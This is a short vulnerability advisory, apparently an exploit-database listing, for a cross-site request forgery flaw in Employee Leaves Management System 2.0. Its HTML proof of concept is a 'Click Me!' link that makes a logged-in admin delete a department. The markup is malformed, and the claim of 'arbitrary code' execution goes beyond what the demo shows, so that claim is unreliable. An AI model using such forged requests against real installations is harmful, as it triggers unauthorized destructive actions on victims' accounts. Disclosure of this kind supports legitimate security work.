Employee Leaves Management System 2.0 Cross Site Request Forgery

2020.01.27
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: Employee Leaves Management System 2.0 Cross-Site Request Forgery # Date: 22-01-2020 # Author: Priyanka Samak # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/employee-leaves-management-system-elms/ # Software: Employee Leaves Management System # Version : 2.0 # Tested on Windows 10 # Vulnerability Type: Cross-Site Request Forgery #Cross-site Request Forgery is an attack whereby an attacker tricks a victim into performing actions on their behalf. #*1. Description* #The vulnerability exists due to failure in the "/managedepartments.php" script to properly verify the source of HTTP request. #This Cross-Site Request Forgery (CSRF) allows an attacker to execute arbitrary code by sending a malicious request to a logged-in user. #*2. Proof of Concept:* This example sends HTTP GET crafted request in order to delete the specified department. <html> <body <button class="button"><a href=" http://localhost/elms/admin/managedepartments.php?del=6">Click Me!</button> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top